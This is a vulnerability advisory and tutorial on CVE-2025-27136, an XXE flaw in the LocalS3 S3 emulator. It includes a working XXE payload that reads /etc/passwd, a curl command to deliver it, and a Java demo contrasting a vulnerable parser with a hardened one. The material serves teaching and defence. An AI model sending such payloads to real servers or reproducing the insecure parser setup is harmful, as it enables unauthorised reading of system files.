CVE-2025-27136 – LocalS3 CreateBucketConfiguration Endpoint XXE Injection

Research & Tutorials

Jul 24, 2025

Discover how CVE-2025-27136, a critical XXE vulnerability in LocalS3’s CreateBucketConfiguration endpoint, can be exploited to access sensitive files. Learn how the flaw works and how to mitigate it.

OffSec Team

Overview

CVE-2025-27136 is an XML External Entity (XXE) injection vulnerability in the CreateBucketConfiguration endpoint of LocalS3, a local AWS S3 emulator. By sending specially crafted XML payloads, an attacker can exploit this flaw to read arbitrary files from the server’s filesystem.

  • CVE ID: CVE-2025-27136
  • Severity: Medium
  • CVSS Score: 5.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
  • EPSS Score: 0.11%
  • Published: April 12, 2025
  • Impact: Information Disclosure
  • Attack Vector: Remote
  • Authentication Required: No
  • Vulnerable Component: CreateBucketConfiguration XML parsing

This vulnerability affects any deployment running a vulnerable version of LocalS3 whose bucket creation endpoint accepts XML requests from untrusted clients.

Technical Breakdown

The CreateBucketConfiguration API endpoint accepts XML input to configure new buckets. LocalS3 parses that input with an insecurely configured XML parser that does not disable external entity resolution.

By crafting a malicious XML payload with a <!DOCTYPE> declaration that defines an external entity using the file:// URI scheme, an attacker can retrieve the contents of any local file readable by the LocalS3 process: the parser resolves the entity and substitutes the file contents into the document, which are then reflected in the response.
Conditions for Exploitation

  • The LocalS3 instance is running a vulnerable version (prior to the fix).
  • The endpoint / (or the bucket creation route) is reachable by the attacker.
  • XML payloads with external entities are not properly filtered.
  • The attacker knows or guesses sensitive filenames on the server (e.g., /etc/passwd).

Vulnerable Code Snippet (Implied)

Though the actual source code isn’t shown in the advisory, the vulnerability is consistent with an XML parser such as Java’s default SAX/DOM parser being invoked without secure processing flags, e.g.:

import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); // default settings: DOCTYPE allowed, external entities resolved
DocumentBuilder db = dbf.newDocumentBuilder(); // XXE-prone without disabling external entity resolution

Exploitation Steps

  1. Craft a malicious XML payload with an external entity:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<CreateBucketConfiguration>
  <LocationConstraint>&xxe;</LocationConstraint>
</CreateBucketConfiguration>

  2. Send the payload to the LocalS3 endpoint:

curl -X PUT http://localhost:8080/bucket-name -H "Content-Type: application/xml" -d @xxe_payload.xml

  3. If vulnerable, the response will contain the contents of /etc/passwd or whatever file was targeted.

Exploitation with Metasploit

Metasploit does not currently have a module for this CVE, but manual exploitation is straightforward via curl or Burp Suite.

Mitigation

  • Update LocalS3 to the latest version where XML parsing is secured.
  • Ensure XML parsers are configured to disable external entity resolution and, where the application never needs a DTD, to reject <!DOCTYPE> declarations outright.
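The following is an added example, not LocalS3’s code and not from the advisory. It places the implied vulnerable parser configuration beside a hardened one and feeds both a constructed CreateBucketConfiguration body modelled on the payload above (the file path, class name and method names are assumptions made for the demonstration). The hardened factory refuses the DOCTYPE before any entity can be declared, which is the mitigation the second bullet calls for; the feature URIs are the standard JAXP/Xerces ones.

```java
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;
import java.io.StringReader;

public class XxeHardeningDemo {

    // Constructed request body modelled on the advisory's payload (sample data, not captured
    // traffic). /etc/hostname is an assumed, low-sensitivity file that exists on most Linux hosts.
    static final String SAMPLE_BODY =
        "<?xml version=\"1.0\"?>\n" +
        "<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"file:///etc/hostname\"> ]>\n" +
        "<CreateBucketConfiguration>\n" +
        "  <LocationConstraint>&xxe;</LocationConstraint>\n" +
        "</CreateBucketConfiguration>";

    /** Parser built the way the advisory implies: factory defaults, entity resolution left on. */
    static DocumentBuilder vulnerableBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        return dbf.newDocumentBuilder();
    }

    /** Hardened parser: no DOCTYPE, no external entities, no external DTD/schema access. */
    static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        // Primary control: a body carrying <!DOCTYPE> is rejected at parse time.
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth in case a DTD ever has to be allowed.
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        dbf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        dbf.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        return dbf.newDocumentBuilder();
    }

    /** Cheap pre-parse check for a web layer or WAF rule; not a substitute for the parser settings. */
    static boolean containsDoctype(String body) {
        return body.toUpperCase().contains("<!DOCTYPE");
    }

    /** Parses the body and returns the LocationConstraint text, i.e. what the server would echo. */
    static String locationConstraint(DocumentBuilder db, String body) throws Exception {
        Document doc = db.parse(new InputSource(new StringReader(body)));
        return doc.getElementsByTagName("LocationConstraint").item(0).getTextContent().trim();
    }

    public static void main(String[] args) throws Exception {
        System.out.println("pre-parse DOCTYPE check flags body: " + containsDoctype(SAMPLE_BODY));

        try {
            String value = locationConstraint(vulnerableBuilder(), SAMPLE_BODY);
            System.out.println("default parser expanded the entity to: \"" + value + "\"");
        } catch (Exception e) {
            // e.g. FileNotFoundException if the referenced file does not exist on this host
            System.out.println("default parser tried to resolve the entity and failed: " + e);
        }

        try {
            locationConstraint(hardenedBuilder(), SAMPLE_BODY);
            System.out.println("UNEXPECTED: hardened parser accepted the body");
        } catch (SAXParseException e) {
            System.out.println("hardened parser rejected the body: " + e.getMessage());
        }
    }
}
```

Compile and run with `javac XxeHardeningDemo.java && java XxeHardeningDemo` on a JDK 8 or later; no third-party libraries are required. The first branch shows the default parser substituting the file contents into the element the server would reflect, which is exactly the information disclosure described above; the second shows the hardened parser stopping at the DOCTYPE with a parse error before any file is opened. A `SAXParseException` on a DOCTYPE is also a useful signal to log and alert on, since legitimate bucket creation requests never carry one.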
